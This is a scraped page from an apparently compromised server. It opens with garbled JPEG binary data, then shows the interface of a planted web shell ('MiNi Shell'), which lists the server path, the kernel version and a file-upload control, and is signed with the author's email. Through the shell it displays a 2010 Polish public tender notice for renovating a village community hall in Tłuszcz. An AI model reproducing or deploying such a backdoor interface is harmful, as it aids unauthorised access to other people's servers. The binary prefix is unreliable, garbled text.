JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100119/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100119/15120-N-2010.html

<p class="kh_header"><b>Tłuszcz: Remont budynku, zagospodarowanie terenu i wyposażenie świetlicy wiejskiej we wsi Dzięcioły, gmina Tłuszcz</b><br>
<b>Numer ogłoszenia: 15120 - 2010; data zamieszczenia: 19.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Tłuszcz , ul. Warszawska 10, 05-240 Tłuszcz, woj. mazowieckie, tel. 029 7573016, faks 029 7573016.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tluszcz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont budynku, zagospodarowanie terenu i wyposażenie świetlicy wiejskiej we wsi Dzięcioły, gmina Tłuszcz.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest remont budynku, zagospodarowanie terenu i wyposażenie świetlicy  wiejskiej we wsi Dzięcioły, gmina Tłuszcz.
Budynek świetlicy zlokalizowany jest na działkach o numerach ewidencyjnych 552/1 i 550/1.

1.Roboty remontowe  budynku

1.1.  Roboty wewnętrzne
rozebranie starych posadzek i podłoży pod posadzki oraz wykonanie nowej 
z terakoty antypoślizgowej wraz z wykonaniem izolacji przeciwwilgociowej 
i termicznej we wszystkich pomieszczeniach,
rozebranie sceny w sali głównej, 
rozebranie płyt boazeryjnych ścian w sali głównej i pomieszczeniach towarzyszących oraz wykonanie tynku mozaikowego żywicznego, lamperii i płytki glazurowane w sanitariatach,
przetarcie niektórych starych tynków oraz ich malowanie farbami emulsyjnymi,
wymianę skrzydeł drzwi wewnętrznych,
wykonanie przewodów wywiewnych od sufitu z wyprowadzeniem ponad dach budynku rurami PCV z zakończeniem wywietrzakami typowymi  150 mm,
wykonanie otworów nawiewnych w ścianach zewnętrznych sali,
wymiana urządzeń białego montażu w łazienkach,
wygrodzenie ściankami działowymi miejsca na łazienkę,
roboty instalacji sanitarnej, wodociągowej i elektrycznej,
montaż grzejników panelowych.

1.2. Roboty zewnętrzne

wymiana obróbek blacharskich,
zdemontowanie starej drewnianej (zużytej i niespełniającej żadnych wymogów technicznych) stolarki okiennej i drzwiowej,
montaż nowej stolarki okiennej z tworzywa PCV,
montaż drzwi zewnętrznych z profili aluminiowych,
wykonanie docieplenia  budynku płytami styropianu gr. 12 cm z wyprawą tynkową akrylową wg technologii lekkiej mokrej.
obłożenie cokołu budynku tynkiem mozaikowym,
rozebranie komina ponad dachem i wykonanie nowego z cegły klinkierowej,
rozebranie schodów betonowych i wykonanie nowych schodów wraz z podjazdami dla niepełnosprawnych z kostki brukowej i palisad betonowych.


2. Zagospodarowanie terenu

malowanie istniejącego ogrodzenia z siatki drucianej farbą antykorozyjną,
wykonanie ogrodzenia na cały obwodzie z elementów stalowych,
wykonanie ogrodzenia o długości 323,00 z siatki na słupkach stalowych w dalszej części działki (za budynkiem na trzech granicach działki),
urządzenie placu zabaw dla dzieci,
wykonanie nawierzchni dojazdu i parkingu przy budynku z kostki brukowej betonowej,
ustawienie tablicy ogłoszeń,
schody zewnętrzne do budynku i podjazdy dla niepełnosprawnych.

3. Wyposażenie placu zabaw

3.1. Karuzela - szt. 1.
Bez trzpieniowa, łożyskowana tocznie, bezobsługowa rurowa konstrukcja malowana proszkowo, tarcza z aluminiowej blachy ryflowanej.
Grupa wiekowa: 0 - 14 lat.
Wysokość swobodnego upadku < 0,6 m.
Przestrzeń minimalna - 5,5 m.
Maksymalna wysokość - 0,9 m.
3.2. Zestaw ze zjeżdżalnią - szt. 1.
Uniwersalny zestaw ze zjeżdżalnią wykonany z tworzywa HDPE, drewna klejonego, zjeżdżalnia metalowa, stopy stalowe, ocynkowane.
Skład zestawu:
wieża kwadratowa z daszkiem,
zjeżdżalnia,
most linowy,
ścianka linowa - pajęczyna,
wejście linowe,
koci grzbiet.
Dodatkowo należy wykonać wokół zestawu po granicy wyznaczonej strefy swobodnej (bezpieczeństwa) palisadę z belek drewnianych okrągłych wkopanych oraz podłoże pod zestaw z piasku płukanego bez zagęszczenia grubości 20 cm.
Grupa wiekowa: 3 - 14 lat.
Wysokość swobodnego upadku < 2,5 m.
Przestrzeń minimalna - 9,7 x 8,6 m.
Maksymalna wysokość - 3,8 m.
3.3. Huśtawka podwójna drewniana - szt. 1.
Konstrukcja:
bela pozioma ze stali ocynkowanej,
słupki z drewna litego o przekroju 90 x 90 mm, posadowione na stopach stalowych ocynkowanych zakotwionych w gruncie przez zabetonowanie,
zawiesia łożyskowe ze stali nierdzewnej,
siedzisko stalowe zabezpieczone gumą.
Grupa wiekowa: 3 - 14 lat.
Wysokość swobodnego upadku < 1,5 m.
Przestrzeń minimalna - 3,5 x 7,5 m.
Maksymalna wysokość - 2,4 m.
3.4. Sprężynowiec - szt. 3.
Sprężyna o średnicy 200 mm, wysokości 400 mm, zabetonowana w gruncie za pomocą ocynkowanej ogniowo kotwy. Konstrukcja wykonana z tworzywa HDPE.
Grupa wiekowa: 0 - 14 lat.
Wysokość swobodnego upadku < 0,6 m.
Przestrzeń minimalna - 3,0 m.
Maksymalna wysokość - 0,6 m.
3.5. Huśtawka wagowa - szt. 1.
Słupy podstawy wykonane ze stali ocynkowanej malowanej proszkowo, belka z drewna klejonego o przekroju 90 x 90 mm. Łożysko i uchwyty malowane proszkowo. Siedziska profilowane z tworzywa sztucznego.
Grupa wiekowa: 3 - 14 lat.
Wysokość swobodnego upadku < 1,0 m.
Przestrzeń minimalna - 3,3 x 6,0 m.
Maksymalna wysokość - 1,0 m
3.6. Tablica ogłoszeniowa - szt. 1.
Wykonana z impregnowanego drewna litego na słupie o przekroju 90 x 90 mm. Słup zakończony stalową ocynkowaną stopą kotwioną w gruncie za pomocą betonu.
Przestrzeń minimalna - 1,0 x 0,4 m.
Maksymalna wysokość - 2,3 m.
3.7. Kosze na śmieci - szt. 3.
Konstrukcja drewniana, impregnowana z wkładem z blachy ocynkowanej.
Wymiary 0,6 x 0,6 m
Maksymalna wysokość 0,6 m.
3.8. Ławki parkowe z oparciem - szt. 6.
Stelaż stalowy ocynkowany malowany proszkowo, zakotwiony w gruncie za pomocą stóp betonowych. Siedzisko oraz oparcie wykonane z modrzewia syberyjskiego o grubości desek 35 mm.
3.9. Płotek zabezpieczający plac zabaw.
Długość - 40 m, wysokość - 0,9 m.
Słupy wykonane z impregnowanego drewna litego, zakotwione w gruncie za pomocą  betonu, przęsła wykonane z deski ryflowanej. Furtka z samozamykaczem.

4. Wyposażenie świetlicy

4.1. Apteczka - 1szt.
4.2. Kosz na śmieci - 1szt.
4.3. Stolik - 20 szt.
4.4. Krzesła - 80 szt.
4.5. Wieszak stojący - 5szt.
4.6. Zestaw meblowy - 1kpl.
4.7. Zestaw gier dla dzieci i młodzieży -	1kpl.
4.8. Stół do gry w piłkarzyki - 2 szt.
4.9. Stół do gry w tenisa stołowego, siatka, rakietki - 2 kpl.
4.10. Zestaw nagłośnieniowy - 1 kpl
4.11. Żaluzje pionowe - 3 szt.
4.12. Kosz na śmieci - 2szt.
4.13. Regał magazynowy - 2 szt.
4.14. Szafki kuchenne - 1kpl.
4.15. Chłodziarka - 1szt.
4.16. Czajnik elektryczny - 1szt.
4.17. Szafa chłodnicza - 1 szt.
4.18. Kuchnia elektryczna 4-płytowa z piekarnikiem - 1 szt.
4.19. Okap kuchenny - 1 szt.
4.20. Zmywarka do naczyń - 1 szt.
4.21. Stół roboczy z półką dolną - 1 szt.
4.22. Kuchenka mikrofalowa - 1 szt.
4.23. Kosz na śmieci - 1szt
4.24. Pojemnik na ręczniki jednorazowe - 1szt.
4.25. Pojemnik na mydło w płynie - 1szt.
4.26. Żaluzje poziome - 1kpl.
4.27. Pojemnik na papier toaletowy - 3szt.
4.28. Wiadro pedałowe - 3szt.
4.29. Pojemnik na ręczniki jednorazowe - 2szt.
4.30. Pojemnik na mydło w płynie - 2szt.
4.31. Lustro łazienkowe -	2szt.
4.32. Pochwyt dla niepełnosprawnych - 1szt.

5. Instalacje wodno-kanalizacyjne i c.o.

5.1. Wykonanie wewnętrznej instalacji wodociągowej. 
5.2. Wykonanie wewnętrznej instalacji kanalizacyjnej.
5.3. Wykonanie przykanalika ze zbiornikiem na fekalia.
5.4. Wykonanie studni wierconej.
5.5. Wykonanie przyłącza wodociągowego ze studni wierconej.
5.6. Wykonanie instalacji c.o.  w pomieszczeniach socjalnych.
5.7. Wykonanie wentylacji grawitacyjnej w pomieszczeniach socjalnych.
5.8. Wykonanie instalacji c.o. w garażu i pomieszczeniu magazynowym.
5.9. Wykonanie wentylacji grawitacyjnej w garażu i pomieszczeniu magazynowym.


6. Instalacja zbiornikowa gazu płynnego 

6.1. Montaż zbiornika gazu płynnego o pojemności  2 700 litrów.
6.2. Wykonanie przyłącza gazowego.
6.3. Wykonanie instalacji gazowej.
6.4. Wykonanie instalacji wewnętrznej.
6.5. Wykonanie instalacji odgromowej.
6.6. Demontaż istniejącej instalacji.
6.7. Wykonanie tablicy rozdzielczej i WLZ.


7. Instalacje elektryczne

7.1. Wykonanie instalacji oświetlenia podstawowego.
7.2. Instalacja gniazd wtykowych.
7.3. Wykonanie instalacji zasilania urządzeń.
7.4. Wykonanie instalacji odgromowej.
7.5. Wykonanie instalacji przeciwprzepięciowej.
7.6.Wykonanie instalacji przeciwprzepięciowej.
8. Projekt do wglądu w siedzibie Zamawiającego.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.33.00.00-9, 45.33.11.00-7, 45.31.00.00-3, 45.33.30.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości: 10.000. PLN (słownie:  dziesięć tysięcy 00/100 PLN)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1Sytuacja podmiotowa wykonawcy
Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych
2Zdolność ekonomiczna i finansowa
Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia
3Zdolność techniczna
Wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia

4 Nie podlega wykluczeniu z postępowania o udzielenie zamówienia  

Sprawdzenie spełnienia warunków w/w warunków nastąpi w oparciu o dokumenty wymagane w SIWZ, złożone w ofercie. Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana wg formuły (spełnia -  niespełnia).</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1Formularz oferty 

2Aktualny odpis z właściwego rejestru
Aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert
3Zaświadczenie z właściwego organu podatkowego oraz ZUS
Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert
4Ubezpieczenie od odpowiedzialności cywilnej
Polisa lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na sumę gwarancyjną nie mniejszą niż 200 000zł   na jeden i wszystkie wypadki
5Wykaz osób uczestniczących w wykonywaniu zamówienia
Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia - nadzór budowlany, wraz z informacjami na temat ich kwalifikacji zawodowych - niezbędne uprawnienia, doświadczenia i wykształcenia do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności
6Potwierdzenie posiadanych uprawnień
Dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. Aktualne uprawnienia budowlane  nadzoru do kierowania robotami , aktualne zaświadczenie potwierdzające przynależność w/w pracowników do właściwej izby samorządu zawodowego (wydane przez izbę)
7Wykaz wykonanych robót budowlanych
Wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, min. 3 roboty odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie
8Oświadczenie z art. 22 i 24
Oświadczenie z art. 22 i 24
9.kosztorys ofertowy
Kosztorys ofertowy sporządzony w oparciu o załączone do SIWZ przedmiary robót.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.tluszcz.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Tłuszczu
ul. Warszawska 10
05-240 Tłuszcz.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.02.2010 godzina 09:00, miejsce: Urząd Miejski w Tłuszczu
ul. Warszawska 10
05-240 Tłuszcz
pok.30.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com